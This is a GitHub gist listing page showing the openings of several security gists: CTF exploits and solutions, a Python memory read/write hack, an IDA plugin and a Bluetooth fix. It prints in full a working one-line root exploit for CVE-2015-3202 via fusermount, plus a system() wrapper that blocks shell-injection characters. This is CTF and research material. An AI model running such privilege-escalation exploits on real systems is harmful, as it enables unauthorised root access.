Skip to content

Instantly share code, notes, and snippets.

View hellman's full-sized avatar
🍊

Aleksei Udovenko hellman

🍊
618 followers · 24 following
View GitHub Profile
@ShikChen
ShikChen / birthday.cpp
Created August 18, 2014 18:31
HITCON CTF 2014, WTF6
#include <cstdio>
#include <cstring>
#include <cassert>
#include <cstdint>
#include <algorithm>
#include <queue>
#include <openssl/sha.h>
#define LOG(fmt, ...) \
fprintf(stderr, "[%.2f] %s:%d - " fmt, 1.0 * clock() / CLOCKS_PER_SEC, \
@g05u
g05u / alewife_exploit.py
Last active August 29, 2015 14:16
Boston ctf party alewife writeup/exploit
#!/usr/bin/env python
import struct, sys, time
from nulllife import *
import ast
# @_g05u_
#boston ctf party 2015
# exploit alewife chall
# www.null-life.com
@thejh
thejh / bettersystem.c
Last active December 18, 2015 15:25
ULTIMATE VULN FIX
#define _GNU_SOURCE
#include <dlfcn.h>
#include <string.h>
int system(const char *cmd) {
static int (*realsystem)(const char *);
if (!realsystem) realsystem = dlsym(RTLD_NEXT, "system");
if (strchr(cmd, ';') || strchr(cmd, '`') || strstr(cmd, "&&") || strstr(cmd, "../")) {
return 1;
}
@taviso
taviso / CVE-2015-3202
Created May 21, 2015 12:52
Making a demo exploit for CVE-2015-3202 on Ubuntu fit in a tweet.
# Making a demo exploit for CVE-2015-3202 on Ubuntu fit in a tweet.
12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
a=/tmp/.$$;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202
# Here's how it works, $a holds the name of a shellscript to be executed as
# root.
a=/tmp/.$$;
# $b is used twice, first to build the contents of shellscript $a, and then as
@pakt
pakt / rdwr.py
Created August 15, 2015 10:59
Direct read/write access to Python's memory
#
# read/write access to python's memory, using a custom bytearray.
# some code taken from: http://tinyurl.com/q7duzxj
#
# tested on:
# Python 2.7.10, ubuntu 32bit
# Python 2.7.8, win32
#
# example of correct output:
# inspecting int=0x41424344, at 0x0228f898
@HoLyVieR
HoLyVieR / hmac-crc.py
Last active December 24, 2019 07:23
HMAC-CRC Solution
#!/usr/bin/env python
"""
Utility fonction to convert from one form to an other
"""
def to_bits(length, N):
return [int(i) for i in bin(N)[2:].zfill(length)]
def from_bits(N):
return int("".join(str(i) for i in N), 2)
@zachriggle
zachriggle / README.md
Last active May 25, 2016 07:20
DEFCON CTF Qualifiers 2016 -- heapfun4u Exploit

DEFCON CTF Qualifiers 2016 -- heapfun4u Exploit Write-Up

The write-up is the exploit.

Example Output

[*] './heapfun4u'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
@pylover
pylover / a2dp.py
Last active May 19, 2024 11:50
Fixing bluetooth stereo headphone/headset problem in ubuntu 16.04, 16.10 and also debian jessie, with bluez5.
#! /usr/bin/env python3
"""Fixing bluetooth stereo headphone/headset problem in debian distros.
Workaround for bug: https://bugs.launchpad.net/ubuntu/+source/indicator-sound/+bug/1577197
Run it with python3.5 or higher after pairing/connecting the bluetooth stereo headphone.
This will be only fixes the bluez5 problem mentioned above .
Licence: Freeware
@hellman
hellman / generate.py
Created October 11, 2016 18:00
HITCON QUALS 2016 - Reverse (Reverse 500)
from binascii import crc32
def lcg_step():
global lcg
lcg = (0x5851F42D4C957F2D * lcg + 0x14057B7EF767814F) % 2**64
return lcg
def extract(val):
res = 32 + val - 95 * ((
((val - (0x58ED2308158ED231 * val >> 64)) >> 1) +
@williballenthin
williballenthin / hint_calls.py
Last active April 4, 2024 03:40
'''
IDA plugin to display the calls and strings referenced by a function as hints.
Installation: put this file in your %IDADIR%/plugins/ directory.
Author: Willi Ballenthin <william.ballenthin@fireeye.com>
Licence: Apache 2.0
'''
import idc
import idaapi
import idautils